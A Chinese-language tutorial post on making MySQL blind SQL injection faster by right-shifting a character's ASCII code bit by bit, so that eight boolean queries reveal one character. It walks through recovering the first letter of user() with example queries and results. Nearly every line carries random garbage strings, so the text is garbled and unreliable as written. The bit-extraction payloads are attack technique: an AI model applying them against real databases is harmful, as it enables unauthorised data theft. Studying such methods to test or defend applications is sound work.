关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位
, p$ s5 D- v: F  `
0 Q/ b) v7 H8 [0 h

下面将以查询mysql数据库当中user()的第一位为例:
# R& ]+ g9 u1 s
$ h3 i) D4 \( {& v! }6 I
% ~' A9 m& {+ F9 {* ^! D6 }
. V: B' y9 W  z$ T) cps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

  M  F! Y$ I6 F
/ `$ b" j3 r% ]* _
首先执行如下sql语句:

7 O0 C/ k6 ^' Z5 k7 F5 y( t  F: C

8 D. ~' N& v9 c$ S' n; d- X$ ymysql> select (ascii((substr(user(),1,1))) >> 7)=0;

8 k- V7 [# k# y

6 i& K, k3 R) ^/ N: x1 I3 _! S2 _我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

1 ]8 u3 N7 O! Q' x+ k

第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
2 Z- W) G  y) M1 ~
. G$ y: `! R2 ?1 j  U4 _! T

如果运算结果为1,说明第一位为0,不为1

7 S; N, \" ~, g9 E# W  z3 h

3 C" t* n& H# W9 i4 _+————————————–+
; K3 x- B% H$ a! }! a2 t
; P- W1 T2 m- |1 F3 || (ascii((substr(user(),1,1))) >> 7)=0 |
. m! L  Q; R% T8 z
3 B7 b" t* P0 C4 M# T6 h( M6 q( L+————————————–+

| 1 |
. y* D* B$ F' n  `# C2 b- u# o
+————————————–+

, @2 _5 X7 p4 a2 Z! P' [3 z! c: }1 row in set (0.00 sec)

" T. C6 g" v7 R) N8 J8 \这样我们就确定这个8bit的ascii的第一位为0
/ \- r- C7 A: n" W# o& R
+ e' O" U( C, ^2 K! t

% ?2 D0 x+ j6 ?; \; G第二次我们来做6次右偏移来确定前两位
7 f" u% ]: W! y" v! A# y" u
0 x- S+ f) x  l# h, `1 Q
. B- s0 A$ b4 I! j  u! l1 u5 m
前两位可能是01或00,即依然可以与0做比较,

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

4 S$ q2 k( F3 e1 W  J| (ascii((substr(user(),1,1))) >> 6)=0 |
9 ]# W. H; I% H
) O. Y% [+ E& h( {  p) Z& ~, D+————————————–+
5 ~" @, {, h( U
| 0 |
' s4 W% s  k+ Z( V( B3 t" Y
; j" w( }/ I9 ]* d+————————————–+
' g" T( _* o  q! t6 E" H
1 row in set (0.00 sec)
2 B+ k9 Y: S  d/ j) W$ a


" D/ E  I- [6 [2 I* C结果为0,即第二位为1

( G6 v# [7 |4 j3 r
  {( ?2 V6 i: C/ Z3 z
- m  [" ]$ L- R; u0 U开始猜测前三位为010或011

- Z4 [* ?, O) Y' ^! L) ?- y

+ d# a+ |: Z9 P/ f9 _: ]让我们看看010和011的ascii码是多少
/ {6 Z. v! }! X; f
. L  r9 _' W2 Y0 M# m9 r0 I
6 V2 P1 X0 A7 ~
: w, K+ n* p4 k6 _- N* X% X2 P分别查询select b’011′ select b’010′
' R5 Q* O% D" I- Z& Z5 m0 e! I  b


0 l" |" y& b5 ~  X1 R* ?5 F获得结果 010 = 2 011 = 3
% Q0 c5 i# @2 o6 }' a7 n0 u) o* J, q
7 j6 I& m  |( G% F3 @5 G

执行如下sql:

+ X, t; [. c  D( D1 X
1 v7 Q2 m- |! R  R" f2 S
7 `4 n4 K% a" C& V# {" Xmysql> select (ascii((substr(user(),1,1))) >> 5)=2;

+————————————–+

' ~9 k) ?7 m( o, m7 g/ m: k| (ascii((substr(user(),1,1))) >> 5)=2 |

8 z/ w% J7 ~# e. ~1 C/ V7 R+————————————–+

( ^5 }6 o: x( V| 0 |
, k) D6 P6 m% p% g) E# R
: Y* A8 i5 L+ g1 @' U, t- N+————————————–+

即前三位不为010,而是011
4 ^% \; O7 |& z" I# y; V( W0 f9 h


% h) a7 e8 J# W& t! f% C直到获得最后一位
$ ^* Q9 v9 z0 _/ H
* I9 h' L9 M# z5 Y! d7 N
, x0 T5 F/ ?- J  w) E) z
最终结果为:01110010

8 Q1 }: s: l* C
0 B$ M; R& u1 S3 V2 N7 E1 U
转换一下:

  ?5 k% c% @2 i4 |1 F5 q1 B0 s" U
3 v- t" ^+ q: r! V) h
select b’01110010′


- _  C) ?5 d. c; H: g
  I/ X3 ?( T8 ?; `6 ?: q查询结果
) v7 g( [& U8 r7 [& V% Y& ~
7 L  U$ C" _8 d  _" L; R% E

) w  c$ H1 r0 P+————-+
$ F, b3 y! K* J5 P
| b’01110010′ |
# v* H# R% I; H
+————-+
+ n9 i) p/ y" h0 p9 Z' f9 _
8 t' V" g. Z; @* F+ E% J4 e6 H| r |

' W9 ]8 O4 M+ u5 V+————-+

1 row in set (0.00 sec)

6 c4 T! e, S3 R

这样我们就获得了user()的第一位.其它位依此类推
2 x  K9 N! ^4 T) o* n: F; S